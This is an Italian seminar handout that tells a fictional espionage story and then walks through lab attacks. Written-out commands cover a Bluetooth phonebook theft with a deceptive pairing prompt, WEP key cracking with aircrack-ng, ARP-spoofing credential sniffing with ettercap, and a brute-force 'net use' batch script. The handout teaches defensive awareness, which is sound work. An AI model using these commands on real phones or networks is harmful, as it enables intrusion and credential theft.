HACK ATTACK IL LABORATORIO ATTENZIONE

Dimensione: px
Iniziare la visualizzazioe della pagina:

Download "HACK ATTACK IL LABORATORIO ATTENZIONE"

Transcript

1 HACK ATTACK IL LABORATORIO ATTENZIONE I L P R E S E N T E D O C U M E N T O H A SCOPO ESCLUSIVAMENTE DIDATTICO ED INFORMATIVO, L UTILIZZO NON AUTORIZZATO DELLE TECNICHE E M E T O D O L O G I E D I S E G U I T O ILLUSTRATE SU DISPOSITIVI ALTRUI È SEVERAMENTE VIETATO E VIENE PERSEGUITO A NORMA DI LEGGE

2 Introduzione Vogliamo innanzitutto ringraziare i numerosissimi partecipanti presenti alla sessione di laboratorio e per le tante di gradimento che abbiamo ricevuto. Quando abbiamo pensato alla realizzazione del laboratorio, la problematica principale nella quale ci siamo subito imbattuti è stata quella di rendere interessante e leggera la sessione, considerando l orario dell intervento (tardo pomeriggio) e il livello di attenzione dei partecipanti sottoposti ad una intensa giornata di relazioni. Abbiamo così deciso di presentare alcune delle tecniche più spettacolari e degli attacchi più interessanti attraverso la recitazione di una storia immaginaria elaborata però da esperienze professionali realmente accadute. I temi trattati non hanno avuto certamente un approccio tecnico approfondito ma il nostro obiettivo era quello di portare a conoscenza dei partecipanti dell esistenza di tali tecniche e minacce cercando di far capire le modalità di innesco e realizzazione senza entrare nel dettaglio. Questo breve documento ha proprio lo scopo di approfondire tecnicamente quello che vi abbiamo mostrato nel laboratorio del seminario. La storia Arruzzoli e Orlandi sono due consulenti per la sicurezza informatica che collaborano spesso alla realizzazione di soluzioni per la sicurezza ICT di aziende private ed enti governativi. Un giorno ricevono la telefonata di un loro cliente, l amministratore delegato dell AXAN Technology (azienda farmaceutica), il quale gli chiede di recarsi subito al centro ricerche AXAN per cercare di risolvere un grave problema di sicurezza. Orlandi arriva per primo al centro ricerche e chiede informazioni sull accaduto all amministratore. L amministratore gli spiega che alcune ore fà la sicurezza interna ha notato un auto che sostava nel parcheggio privato dell AXAN con all interno una persona che stava utilizzando un computer portatile in modo sospetto. Gli agenti della sicurezza si sono avvicinati e hanno notato che la persona stava utilizzando una macchina virtuale con un sistema operativo client della AXAN ma costui non era un dipendente AXAN né un soggetto autorizzato all utilizzo dei sistemi informatici AXAN; hanno così pregato la persona a seguirli nel centro ricerche per capire meglio quanto stava accadendo. La persona li segue senza opporre resistenza e dopo una verifica effettuata dall amministratore del sistema ICT dell AXAN risulta che l immagine virtuale del client trovata in possesso della persona, apparteneva ad un portatile rubato alcuni mesi prima ad un ricercatore della AXAN. La persona si rifiuta di rispondere alle domande ma alla richiesta di poter visionare il portatile, non fà nessuna obiezione, al contrario, ci tiene che i tecnici AXAN lo esaminino. Questo comportamento ha insospettito l amministratore delegato che vuole cercare di capire cosa realmente può aver fatto quella persona prima di intraprendere qualsiasi azione legale. Orlandi si mette al lavoro e dopo una rapida investigazione scopre che la segretaria dell amministratore conosce quella persona in quanto frequentano entrambi la stessa palestra e si ricorda che una sera spettegolando sui propri capi gli aveva confidato che l amministratore dell AXAN aveva il pallino di conservare le credenziali di accesso nella rubrica dei nomi del suo cellulare confondendoli con i nomi reali. Orlandi chiede all mministratore se aveva notato nei giorni precedenti qualcosa di strano sul suo cellulare e l amministratore risponde che il giorno prima, mentre era in riunione presso un azienda concorrente, ha ricevuto un messaggio che gli comunicava la ricarica di 20 euro sul proprio cellulare, istintivamente ha accettato la ricarica ma successivamente, dopo la riunione, ha verificato che non gli era stata accreditata nessuna ricarica ma non ha fatto caso più di tanto all accaduto, pensando ad un errore del gestore telefonico. Orlandi si fà consegnare il cellulare ed effettua una copia (bitstream image) dell immagine virtuale del client per iniziare l analisi tecnica; nel frattempo arriva

3 Arruzzoli e Orlandi lo aggiorna sui dettagli. Iniziano così ad analizzare tutte le informazioni che sono riusciti a raccogliere per cercare di capire se la persona è riuscita a trafugare informazioni riservate. Analizzando il telefono cellulare Orlandi e Arruzzoli verificano la storia del messaggio di ricarica e dopo un breve controllo sul modello e la versione del software capiscono che il sistema bluetooth poteva essere aggirato tramite apposite tecniche per carpire la rubrica telefonica e lo dimostrano (Bluetooth Attack). Successivamente analizzano il luogo dove si trovava l automobile e notano che il segnale della rete wireless della AXAN è raggiungibile. Analizzando la connessione si accorgono che il sistema wireless utilizza crittografia WEP facilmente attaccabile ed effettuano una dimostrazione pratica (WEP Attack). Una volta entrati nella rete AXAN provano ad immaginare cosa possa aver fatto la persona sospetta e analizzando il file system del client virtuale utilizzato scoprono che la persona aveva installato sia aircrack che ettercap. Il programma aircrack conferma loro la teoria dell accesso alla rete wireless tramite attacco al sistema wep mentre la presenza di ettercap lascia supporre la possibilità che la persona sospetta possa aver carpito tramite questo tool crdenziali di autenticazione a vari sistemi della rete AXAN, quindi provano a ripetere l attacco con ettercap per capire il livello di vulnerabilità presente (MAN IN THE MIDDLE ATTACK). Dal risultato ottenuto con le varie prove, Orlandi ed Arruzzoli si rendono conto delle possibili informazioni che la persona può aver acquisito e cercano di capire dove queste informazioni possano essere state nascoste o inviate. Attraverso i prodotti di Log Management e Network Forensic utilizzati dall AXAN verificano che diverse informazioni riservate sono state scaricate sul client virtuale dai sistemi AXAN ma non risulta nessuna trasmissione all esterno della rete AXAN da quel client. Questo fa supporre ad Arruzzoli ed Orlandi che le informazioni siano ancora presenti nel client o siano state cancellate. Provano prima a verificare se si trovano tracce di file cancellati attraverso l utilizzo combinato dei tool Sleuthkit e Autopsy, ma il risultato è negativo, considerando però la possibilità che la persona sospetta possa aver utilizzato tecniche steganografiche per nascondere le informazioni, Orlandi ed Arruzzoli utilizzano un tool realizzato da loro per verificare l esistenza di eventuali presenze steganografiche conosciute nel file system del client AXAN. Prima analizzano (come possibili contenitori) le immagini presenti nel sistema ma il risultato è negativo ed infine analizzano il file system NTFS: in particolare gli attributi Alternate Data Stream presenti (EHG2- Stegano Tool). l esame risulta positivo, infatti vengono ritrovati ed estratti tre file : brute.bat rubrica.txt pentax.txt Il primo file brute.bat : for /f "tokens=1,2 delims= " %%i in (rubrica.txt) do net use \\AXAN-SRV\c$ %%j /u:%%i è un semplice ma funzionale script che esegue un attacco di forza bruta sfruttando una libreria di username e password presenti nel file rubrica.txt. Analizzando il file rubrica.txt : m.rossi f.bianchi Orlandi ed Arruzzoli si accorgono che le credenziali presenti nel file non sono nient altro che la rubrica telefonica del cellulare dell amministratore delegato. A questo punto risulta chiaro che la persona sospetta nei giorni precedenti aveva effettuato un attacco bluetooth al cellulare dell amministratore copiando i nominativi presenti nella rubrica telefonica e successivamente utilizzandoli per lanciare un attacco di forza bruta nella rete AXAN per accedere ai server AXAN. Il terzo file pentax.txt conferma definitivamente l ipotesi fatta, in quanto contiene informazioni riservate su un nuovo tipo di medicinale prodotto dalla AXAN a cui poteva accedere solo l amministratore delegato con le sue credenziali. Orlandi ed Arruzzoli redigono una relazione tecnica in merito a quanto scoperto all amministratore delegato che intraprende un azione legale. Alcuni giorni dopo si scoprirà che la persona sospetta era stata ingaggiata dalla ditta concorrente per acquisire informazioni riservate sul nuovo prodotto della AXAN. Fine della storia.

4 Strumenti utilizzati Durante il laboratorio sono stati utilizzati diversi tool software su sistemi operativi Linux e Microsoft. In particolare per il Vulnerability Assessement è stato mostrato il prodotto GFiLANguard della GFi gli altri software utilizzati sono presenti in una suite Linux chiamata BackTrack (http://www.remoteexploit.org/backtrack_download.html). BackTrack è un live CD basato su sistema operativo Linux (Slax) che contiene una collezione di tool per la verifica della sicurezza dei sistemi ICT. Per la steganografia è stato realizzato un tool freeware (EHG2-Stegano) che dimostra alcune interessanti tecniche steganografiche. Bluetooth Attack (helomoto) L attacco al bluetooth presentato nella sessione di laboratorio è stato scoperto e realizzato da Adam laurie direttore della Bunker Secure Hosting Ltd ed è stato chiamato helomoto in riferimento ad alcuni modelli di cellulari della Motorola su cui è stato possibile realizzare questo tipo di attacco. Helomoto è una combinazione di tre attacchi : Bluesnarf Bluesnarf è stato identificato da Marcel Holtmann nel settembre del 2003 ed è, probabilmente, il più famoso attacco bluetooth, in quanto ha evidenziato una significativa falla nei sistemi di autenticazione bluetooth. L attaccante deve collegarsi a OBEX Push Profile (OPP), servizio pensato per lo scambio di biglietti da visita elettronici e altre informazioni. Nella maggior parte dei casi, questo servizio non richiede l'autenticazione. L attaccante invia una richiesta GET al servizio OBEX della vittima per conoscere nomi di file noti (ad es. la rubrica : telecom/pb.vcf ), in caso di cattiva esecuzione del firmware del telefono cellulare, il malintenzionato è in grado di recuperare tutti i file il cui nome è noto o sia indovinato correttamente. Bluebug Attacco che permette l accesso, il download non autorizzato della rubrica telefonica, degli sms, la possibilità di inviare SMS ed effettuare chiamate telefoniche attraverso l utilizzo di comandi AT in maniera trasparente al proprietario del cellulare. Social engineering/phishing In alcuni modelli di cellulari la connessione non avviene in maniera automatica, in questo caso si deve indurre l utente ad accettare la connessione, mascherando la richiesta in maniera subdola. Gli strumenti utilizzati per realizzare questo attacco sono un device usb bluetooth, la security suite backtrack e il codice dell exploit helomoto( elomoto.html ). Nel laboratorio per prima cosa abbiamo connesso il device bluetooth usb al portatile e verificato il riconoscimento da parte del sistema operativo tramite il comando : hciconfig

5 successivamente abbiamo attivato il device bluetooth usb con il comando : hciconfig hci0 up Per identificare i device con bluetooth attivo e configurati per essere visibili ad altri dispositivi abbiamo utilizzato il comando : hcitool scan In realtà per poter trovare tutti i device bluetooth disponibili ( visibili e non ) è necessario effettuare una scansione di forza bruta su un range di mac-address, operazione onerosa in termini di tempo; alcuni ricercatori hanno realizzato un sistema hardware e software denominato bluebag che permette la scansione contemporanea di più mac-address ( per saperne di più: ). Per effettuare questo tipo di scansione è possibile utilizzare il tool btscanner presente nella suite backtrack e selezionare l opzione brute force (b) inserendo il range mac-address desiderato. Una volta terminata la scansione e identificato un dispositivo (nel laboratorio del seminario veniva preso come esempio un telefono cellulare della Motorola modello L6) viene effettuato un primo tentativo di connessione attraverso il comando : rfcomm connect 0 < mac-address della vittima> 3 Ident. Device bluetooth Canale bluetooth n.3

6 L interfaccia bluetooth del Motorola presenta due voice gateways uno richiede l autenticazione di accoppiamento (pairing) l altro no, nello specifico l Headset Audio Gateway presente sul canale 3 non la richiede fino a quando non viene effettuata la connessione. Tuttavia il device dell attaccante deve essere presente nella history list del device vittima, altrimenti non potrà connettersi al canale 3. L esecuzione del codice helomoto.c, precedentemente compilato, sul canale 8 risolve questo problema : helomoto plant < mac-address della vittima> 8 A questo punto è necessario indurre l utente ad accettare la connessione, per fare questo si prepara attraverso la configurazione del nome dell interfaccia bluetooth un messaggio subdolo che induca l utente a concedere la connessione : hciconfig hci0 name `perl -e 'print "SchedaSIM\x0dNonAttiva\x0dAttivare?\x0d\x0d"'` e ripetiamo il comando : rfcomm connect 0 < mac-address della vittima> 3 Il device della vittima visualizzerà il messaggio : SchedaSIM NonAttiva Attivare? Se viene accettata la connessione, l attaccante potrà interagire con i comandi AT sul device della vittima con un programma terminal configurando il device usb come una porta seriale (ad es. Cutecom) :

7 WEP Attack Il WEP (Wired Equivalent Privacy) è un algoritmo opzionale dello standard IEEE b, che effettua la crittografia del dato prima che venga irradiato nell'etere. Il WEP utilizza un algoritmo RC4 con chiave a 64 bit, 128 e 256 bit. L'aumento delle velocità di trasmissione e le relative piccole dimensioni dei Vettori di Inizializzazione (IV: stringhe di bit usate per rendere casuale parte della chiave) utilizzate nel WEP, fanno sì che in condizioni di traffico normale sia possibile per un attaccante ottenere la chiave di codifica, e quindi l accesso alla rete e alle informazioni trasmesse in un lasso di tempo relativamente breve (un paio d ore). L aumento dei bit di codifica serve solo a ritardare l'accesso alla rete da parte di un attaccante (sarebbe più indicato un cambio frequente della chiave wep). Nel laboratorio del seminario si è utilizzato il tool aricrack-ng per effettuare l attacco ad una rete WEP a 128 bit. Gli strumenti utilizzati per realizzare questo attacco sono una scheda di rete Prism2 con dei driver aggiornati per permettere l injection dei pacchetti (per saperne di più: e la security suite backtrack. L attacco viene portato in 4 fasi Fase 1 Scanning Si effettua una scansione per identificare eventuali reti, su che canale sono e se ci sono client connessi; per fare questa operazione eseguiamo il comando : airodump-ng <interfaccia> (ad es. airodump-ng eth1) Una volta identificata la rete vengono selezionate le seguenti informazioni: BSSID dell AP (mac-address Access Point) ESSID dell AP (nome identificativo Access Point) Channel (il numero del canale di trasmissione) SSID dei client connessi (mac address dei client) BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 00:E0:XX:XX:XX:XX WEP WEP AXAN-AP12 BSSID STATION PWR Lost Packets Probes 00:E0:XX:XX:XX:XX 00:0E:35:XX:XX:XX AXAN-AP12

8 Fase 2 Acquisizione dei pacchetti IV Eseguiamo nuovamente airodump-ng con i seguenti paramentri: airodump-ng -c <canale> -b <BSSID> -w <file.ivs> <interfaccia> esempio : airodump-ng --bssid 00:E0:XX:XX:XX:XX -c 6 --write axan-ap12.dump eth1 In questo modo effettuiamo la cattura dei pacchetti IV sul file axan-ap12.dump. Per effettuare la crittanalisi e quindi individuare la chiave, dobbiamo archiviare circa pacchetti IV (varia in base al numero di bit utilizzati per la crittografia). Per diminuire il tempo di attesa è necessario generare del traffico che permetta di acquisire più pacchetti possibili nel minor tempo, quindi si utilizza il tool aireplay-ng. Questo tool dispone di varie funzionalità, nel nostro caso lo imposteremo con il parametro -3 che di fatto lo rende un generatore di richieste ARP, ad ogni richiesta la base (ad es. l Access Point AXAN-AP12) genera un nuovo vettore di inizializzazione. Il comando viene impostato con i seguenti parametri aireplay-ng -3 -b 00:E0:XX:XX:XX:XX -h 00:0E:35:XX:XX:XX eth1 Mac-address AXAN-AP12 Mac-address di un client connesso Fase 3 Analisi dei pacchetti IV Con aircrack-ng si analizzano i pacchetti IV per decifrare la chiave. Apriamo un nuova console ed eseguiamo il comando : aircrack-ng <file.ivs> Il tempo varia anche in base alla lunghezza della password.

9 Raggiunto il numero di pacchetti sufficienti l algoritmo riesce a trovare la chiave. Fase 4 Configurazione della scheda di rete A questo punto si inserisce la chiave nella configurazione della scheda di rete wireless con il comando : iwconfig eth1 mode Managed Key 1A:43:DC:BB:4C:9D:8B:47:C5:47:CC:55:CD nella maggior parte dei casi è sufficiente eseguire una richiesta dhcp sull interfaccia di rete wireless per ottenere i parametri di configurazione e quindi accedere alla rete: dhcpcd eth1 Man In The Middle attack (MITM) Il MITM è un attacco nel quale l'attaccante è in grado di leggere, inserire o modificare a piacere, le informazioni che vengono scambiate tra due parti senza che nessuna delle due sia in grado di sapere se il collegamento sia stato compromesso. L'attaccante deve essere in grado di osservare e intercettare il transito delle informazioni tra le due vittime. Nel laboratorio del seminario è stato dimostrato come attraverso l uso del tool software ettercap sia possibile per un attaccante connesso ad una rete effettuare un atttacco MITM e carpire informazioni relative alle credenziali degli utenti presenti sulla medesima rete. Per realizzare questo attacco è stata utilizzata la security suite backtrack che contiene il tool software ettercap.

10 Una volta avviato il tool ettercap per prima cosa è necessario selezionare l interfaccia di rete su cui si vuole analizzare il traffico. Una volta selezionata, il menu di ettercap mostrerà ulteriori funzionalità. A questo punto si deve effettuare uno scanning della rete per individuare i computer attivi. A tutti i computer individuati, ettercap, invierà un arp spoofing impostando l opzione Sniff remote connections nel menu Mitm:

11 Una volta attivato ( dal menu Start->Start Sniffing), Ettercap comincerà ad inviare delle richieste arp ad ogni singolo computer individuato, associando il proprio mac-address con tutti gli altri indirizzi dei computer attivi. In questo modo tutte le richieste effettuate dai computer verso altri computer saranno dirottate prima verso l attaccante e solo successivamente saranno redirette al vero destinatario; in questo modo l attaccante ha modo di analizzare ed eventualmente manipolare le informazioni. Lista arp di un client prima dell arp spoofing Lista arp di un client dopo dell arp spoofing In modalità sniffing, ettercap analizza tutto il traffico e quando individua la trasmissioni di credenziali le filtra e le memorizza. E interessante notare la capacità di ettercap di acquisire le credenziali trasmesse anche su canali SSL. In particolare nel caso ettercap trasmette al client un falso certificato digitale che utilizza successivamente per decriptare le credenziali inviate, il tutto in maniera trasparente all utente:

12 Esempi di Steganografia ( EHG2-Stegano Tool ) Il tool utilizzato nel laboratorio del seminario è stato realizzato dall EHG2 (Ethical Hacker Guardian Group) un gruppo di ricerca fondato da Francesco Arruzzoli e Cristiano Orlandi che ha lo scopo di analizzare ed approfondire la conoscenza sulle nuove tecnologie, in particolare sulla loro applicazione, sicurezza ed affidabilità in ambito ICT. Steganografia con le Immagini Steganografia realizzata con gli Alternate Data Stream Il tool permette di utilizzare due tecniche di steganografia quella applicata alla possibilità di inserie inserire un file generico dentro immagini Bitmap utilizzando l algoritmo LSB (Least Significant Bit) algoritmo di inserimento nel bit meno significativo e quella che utilizza la proprietà Alternate Data Stream presente nel file system NTFS dei sistemi operativi Microsoft. Utilizzo del tool con la metodologia LSB Selezionare la Tab LSB Image Steganography successivamente la sotto tab Encrypt. Premere il pulsante Select image.. per selezionare l immagine contenitore e il pulsante Select File.. per selezionare il file da inserire nell immagine contenitore.

13 L indicatore Container Capacity indicherà la % occupata dal file nell immagine contenitore. Per generare l immagine bmp con il file steganografato premere il pulsante Execute Steganography. Per estrarre un file steganografato dall immagine contenitore selezionare la Tab LSB Image Steganography la successivamente la sotto tab Decrypt. Premere il pulsante Select Image.. e selezionare l immagine contenitore, il nome del file nascosto e le sue dimensioni appariranno nella sezione File Contained. Per estrarre il file è sufficiente premere il pulsante Extract File >>.

14 Utilizzo del tool con gli Alternate Data Stream Selezionare la Tab Alternate Data Stream Steganography,selezionare il file contenitore a cui associare il file nascosto tramite ADS, premendo il pulsante relativo alla casella di testo Select file to link ADS, successivamente premere il pulsante relativo alla casella di testo Copy file to an existing ADS per associare il file da nascondere, oppure selezionando l opzione Create a text ADS file è possibile creare un file di testo da associare, semplicemente inserendo il nome del file nella casella di testo ADS file name e il testo da nascondere nella casella di testo Text Content. Per creare l ADS premere il pulsante Make ADS. E possibile associare più file ADS allo stesso file contenitore. Anche cambiando il nome al file contenitore il link ai file ADS rimane ma si perde se viene effettuata una copia su un altro file system.

15 Per ricercare gli ADS presenti nel file system inserire il percorso di ricerca iniziale nella casella di testo Search Path e premere il pulsante Search ADS. Eventuali file ADS saranno visualizzati nella lista Found Files; per aprire, estrarre o eliminare il file ADS selezionarlo dalla lista, premere il plusante destro del mouse e selezionare l opzione desiderata sul menù che appare. Quello che non avete visto ma che è accaduto Durante lo svolgimento del laboratorio, al di là di problemi tecnici tipici della diretta come il filmato iniziale che dalla sala regia stentava a partire o le luci che non si accendevano, per assicurarci la miglior riuscita delle dimostrazioni e ipotizzando la possibilità che qualcuno dal pubblico per spirito goliardico potesse tentare di interferire in qualche modo, abbiamo creato delle Honeypot (in breve: dispositivo che funge da specchietto per le allodole ) per i dispositivi wireless alfine di deviare l attenzione da quelli realmente utilizzati. Il risultato è stato sorprendente nei primi dieci minuti di laboratorio abbiamo registrato sulla Honeypot relativa ai dispositivi bluetooth 5 tentativi di attacco e diversi download dei file civetta. Avremmo voluto discuterne alla fine del seminario ma purtroppo per motivi di tempo non abbiamo potuto, sarebbe stato un interessante approfondimento. Nel ringraziarvi nuovamente per l interesse e la partecipazione, speriamo che il presente documento sia un utile compendio a quanto visto durante il seminario. Distinti Saluti Francesco Arruzzoli (DiNets srl) Cristiano Orlandi (Winitalia)

Man In The Middle & SSL Attack

Man In The Middle & SSL Attack Man In The Middle & SSL Attack Autore: Duffabio Provenienza: http://duffabio.altervista.org/ Ringrazio BlackLight perchè per la teoria mi sono basato sulle sue guide visto che è da li che ho studiato la

Dettagli

Networking Wireless con Windows XP

Networking Wireless con Windows XP Networking Wireless con Windows XP Creare una rete wireless AD HOC Clic destro su Risorse del computer e quindi su Proprietà Clic sulla scheda Nome computer e quindi sul pulsante Cambia Digitare il nome

Dettagli

La Sicurezza delle Reti. La Sicurezza delle Reti. Il software delle reti. Sistemi e tecnologie per la multimedialità e telematica.

La Sicurezza delle Reti. La Sicurezza delle Reti. Il software delle reti. Sistemi e tecnologie per la multimedialità e telematica. Sistemi e tecnologie per la multimedialità e telematica Fabio Burroni Dipartimento di Ingegneria dell Informazione Università degli Studi di Siena burronif@unisi unisi.itit La Sicurezza delle Reti La presentazione

Dettagli

SICE.NET Servizio Informativo Casse Edili

SICE.NET Servizio Informativo Casse Edili SICE.NET Servizio Informativo Casse Edili http://213.26.67.117/ce_test Guida all uso del servizio Internet On-Line CASSA EDILE NUOVA INFORMATICA Software prodotto da Nuova Informatica srl Pag. 1 Il Servizio

Dettagli

Windows 7 PROCEDURA DI COLLEGAMENTO

Windows 7 PROCEDURA DI COLLEGAMENTO Windows 7 PROCEDURA DI COLLEGAMENTO A) Premere sul pulsante Start e selezionare la voce Pannello di Controllo dal menù di avvio di Windows (vedi figura 1) [verrà aperta la finestra Pannello di controllo]

Dettagli

USER GUIDE. Manuale operativo per l utilizzo dell applicativo per il monitoraggio remoto Aditech Life REV 1

USER GUIDE. Manuale operativo per l utilizzo dell applicativo per il monitoraggio remoto Aditech Life REV 1 USER GUIDE Manuale operativo per l utilizzo dell applicativo per il monitoraggio remoto Aditech Life REV 1 SOMMARIO Introduzione... 3 Sensore BioHarness... 3 OVERVIEW BIOHARNESS 3.0 BT/ECHO... 4 OVERVIEW

Dettagli

Introduzione ai certificati S/MIME e alla posta elettronica certificata...2 Procedura di installazione del certificato personale S/MIME rilasciato

Introduzione ai certificati S/MIME e alla posta elettronica certificata...2 Procedura di installazione del certificato personale S/MIME rilasciato Guida all installazione e all utilizzo di un certificato personale S/MIME (GPSE) Introduzione ai certificati S/MIME e alla posta elettronica certificata...2 Procedura di installazione del certificato personale

Dettagli

EM4454 - Wireless USB Adapter

EM4454 - Wireless USB Adapter E EM4454 - Wireless USB Adapter 2 ITALIANO EM4454 - Wireless USB adapter Attenzione In base a leggi, direttive e regolamenti stabilite dall Unione Europea questo dispositivo può essere soggetto a limitazioni

Dettagli

Ettercap, analisi e sniffing nella rete. Gianfranco Costamagna. LinuxDay 2014. abinsula. October 25, 2014

Ettercap, analisi e sniffing nella rete. Gianfranco Costamagna. LinuxDay 2014. abinsula. October 25, 2014 Ettercap, analisi e sniffing nella rete Gianfranco Costamagna abinsula LinuxDay 2014 October 25, 2014 Chi siamo Abinsula un azienda specializzata in sistemi Embedded, Sicurezza Informatica e sviluppo di

Dettagli

Windows XP Istruzioni rete wired per portatili v1.0

Windows XP Istruzioni rete wired per portatili v1.0 Istruzioni rete wired per portatili v1.0 Pagina 1 di 13 Istruzioni rete wired per portatili v1.0 Istruzioni per 1 Introduzione Per seguire le istruzioni qui proposte è necessario utilizzare le utility

Dettagli

Manuale LiveBox WEB AMMINISTRATORE DI SISTEMA. http://www.liveboxcloud.com

Manuale LiveBox WEB AMMINISTRATORE DI SISTEMA. http://www.liveboxcloud.com 2015 Manuale LiveBox WEB AMMINISTRATORE DI SISTEMA http://www.liveboxcloud.com LiveBox Srl non rilascia dichiarazioni o garanzie in merito al contenuto o uso di questa documentazione e declina qualsiasi

Dettagli

Password di Administrator in Windows 2000, XP e NT

Password di Administrator in Windows 2000, XP e NT Password di Administrator in Windows 2000, XP e NT In questa guida impareremo a ottenere la password di Administrator in un sistema basato su Windows 2000 o XP. Materiale: PC vittima con Win 2000 o Xp

Dettagli

Contenuto del pacchetto

Contenuto del pacchetto Contenuto del pacchetto DWL-900AP Trasformatore AC Cavo USB CD d installazione Manuale utente Manuale rapido d installazione Se uno o più componenti dovessero risultare mancanti o danneggiati, contattare

Dettagli

Sicurezza delle reti wireless. Alberto Gianoli alberto.gianoli@fe.infn.it

Sicurezza delle reti wireless. Alberto Gianoli alberto.gianoli@fe.infn.it Sicurezza delle reti wireless Alberto Gianoli alberto.gianoli@fe.infn.it Concetti di base IEEE 802.11: famiglia di standard tra cui: 802.11a, b, g: physical e max data rate spec. 802.11e: QoS (traffic

Dettagli

ALLEGATO 2) ALLO SCHEMA DI CONVENZIONE PER LA FORNITURA DI SERVIZI DI CONNETTIVITA' INTERNET WI-FI PUBBLICA NEL COMUNE DI MARSCIANO

ALLEGATO 2) ALLO SCHEMA DI CONVENZIONE PER LA FORNITURA DI SERVIZI DI CONNETTIVITA' INTERNET WI-FI PUBBLICA NEL COMUNE DI MARSCIANO ALLEGATO 2) ALLO SCHEMA DI CONVENZIONE PER LA FORNITURA DI SERVIZI DI CONNETTIVITA' INTERNET WI-FI PUBBLICA NEL COMUNE DI MARSCIANO Regolamento di connessione pubblica nomadica alla rete Internet in modalità

Dettagli

Allegato 1. Le tecniche di frode on-line

Allegato 1. Le tecniche di frode on-line Allegato 1 Le tecniche di frode on-line Versione : 1.0 13 aprile 2011 Per una migliore comprensione delle tematiche affrontate nella circolare, riportiamo in questo allegato un compendio dei termini essenziali

Dettagli

EW1085R2R2R2 BLUE MICRO Ricevitore Bluetooth USB

EW1085R2R2R2 BLUE MICRO Ricevitore Bluetooth USB EW1085R2R2R2 BLUE MICRO Ricevitore Bluetooth USB EW1085R2R2 BLUE MICRO Ricevitore Bluetooth USB 2 ITALIANO Contenuti 1.0 Introduzione... 2 1.1 Funzioni e caratteristiche... 2 1.2 Contenuto della confezione...

Dettagli

Manuale utente IS-Station Wi-Fi

Manuale utente IS-Station Wi-Fi Manuale utente IS-Station Wi-Fi Versione 1.0 del 17 ottobre 2008 Prodotto da : Distribuito da: Industrial Software SRL Econnet s.r.l. Via Carducci, 56 Via Nicolò Pasquali Alidosi, 18/2 54100 Massa 40139

Dettagli

Manuale LiveBox CLIENT DESKTOP (WINDOWS)

Manuale LiveBox CLIENT DESKTOP (WINDOWS) 2014 Manuale LiveBox CLIENT DESKTOP (WINDOWS) LiveBox Srl non rilascia dichiarazioni o garanzie in merito al contenuto o uso di questa documentazione e declina qualsiasi garanzia espressa o implicita di

Dettagli

Qui riporto uno script di shell in bash che compie queste operazioni in automatico. - Un po di teoria

Qui riporto uno script di shell in bash che compie queste operazioni in automatico. - Un po di teoria Inizieremo con un po di teoria su come funziona il WEP e l RC4 per poi illustrare a fondo il funzionamento di alcuni programmi (Kismet e la suite Aircrack). Infine applicheremo le conoscenze acquisite

Dettagli

Guida d installazione rapida

Guida d installazione rapida V38.01 IP Camera senza fili/cablata Guida d installazione rapida (Per MAC OS) FI8909/FI8909W ShenZhen Foscam Tecnologia Intelligente Co., Ltd Guida d installazione rapida Lista d imballaggio 1) IP CAMERA

Dettagli

NOTE OPERATIVE. Prodotto Inaz Download Manager. Release 1.3.0

NOTE OPERATIVE. Prodotto Inaz Download Manager. Release 1.3.0 Prodotto Inaz Download Manager Release 1.3.0 Tipo release COMPLETA RIEPILOGO ARGOMENTI 1. Introduzione... 2 2. Architettura... 3 3. Configurazione... 4 3.1 Parametri di connessione a Internet... 4 3.2

Dettagli

Ubiquity getting started

Ubiquity getting started Introduzione Il documento descrive I passi fondamentali per il setup completo di una installazione Ubiquity Installazione dei componenti Creazione del dominio Associazione dei dispositivi al dominio Versione

Dettagli

M ODULO 7 - SYLLABUS 1.0. IT Security. Corso NUOVA ECDL 2015 prof. A. Costa

M ODULO 7 - SYLLABUS 1.0. IT Security. Corso NUOVA ECDL 2015 prof. A. Costa M ODULO 7 - SYLLABUS 1.0 IT Security Corso NUOVA ECDL 2015 prof. A. Costa Minacce ai dati 1 Concetti di sicurezza Differenze fra dati e informazioni Il termine crimine informatico: intercettazione, interferenza,

Dettagli

Trasmissione del certificato medico di malattia per zone non raggiunte da adsl (internet a banda larga).

Trasmissione del certificato medico di malattia per zone non raggiunte da adsl (internet a banda larga). Direzione Centrale Sistemi Informativi e Tecnologici Direzione Centrale Prestazioni a Sostegno del Reddito Coordinamento Generale Medico Legale Roma, 10-03-2011 Messaggio n. 6143 Allegati n.1 OGGETTO:

Dettagli

Quaderni di formazione Nuova Informatica

Quaderni di formazione Nuova Informatica Quaderni di formazione Nuova Informatica Airone versione 6 - Funzioni di Utilità e di Impostazione Copyright 1995,2001 Nuova Informatica S.r.l. - Corso del Popolo 411 - Rovigo Introduzione Airone Versione

Dettagli

ANALISI FORENSE. irecovery_analisi_forence.indd 1 21/01/14 17:48

ANALISI FORENSE. irecovery_analisi_forence.indd 1 21/01/14 17:48 ANALISI FORENSE irecovery_analisi_forence.indd 1 21/01/14 17:48 COSA è L informatica forense è la scienza che studia l individuazione, la conservazione, la protezione, l estrazione, la documentazione,

Dettagli

1... reti di calcolatori...15 Introduzione... 15 Parametri di rete... 21

1... reti di calcolatori...15 Introduzione... 15 Parametri di rete... 21 Sommario Introduzione...11 1... reti di calcolatori...15 Introduzione... 15 Parametri di rete... 21 L indirizzo IP... 22 La maschera di sottorete... 25 Protocollo IPv4 e IPv6... 28 Supporto IPv6 in Windows

Dettagli

IP Camera senza fili/cablata. Guida d installazione rapida (Per MAC OS) ShenZhen Foscam Tecnologia Intelligente Co., Ltd

IP Camera senza fili/cablata. Guida d installazione rapida (Per MAC OS) ShenZhen Foscam Tecnologia Intelligente Co., Ltd IP Camera senza fili/cablata Guida d installazione rapida (Per MAC OS) Modello: FI8910W Colore: Nera Modello: FI8910W Colore: Bianco ShenZhen Foscam Tecnologia Intelligente Co., Ltd Guida d installazione

Dettagli

MANUALE D USO Agosto 2013

MANUALE D USO Agosto 2013 MANUALE D USO Agosto 2013 Descrizione generale MATCHSHARE è un software per la condivisione dei video e dati (statistiche, roster, ) delle gare sportive. Ogni utente abilitato potrà caricare o scaricare

Dettagli

IP Camera senza fili/cablata. Guida d installazione rapida (Per MAC OS) ShenZhen Foscam Tecnologia Intelligente Co., Ltd

IP Camera senza fili/cablata. Guida d installazione rapida (Per MAC OS) ShenZhen Foscam Tecnologia Intelligente Co., Ltd IP Camera senza fili/cablata Guida d installazione rapida (Per MAC OS) Modello: FI8916W Colore: Nera Modello: FI8916W Colore: Bianco ShenZhen Foscam Tecnologia Intelligente Co., Ltd Guida d installazione

Dettagli

CHIAVETTA INTERNET ONDA MT503HSA

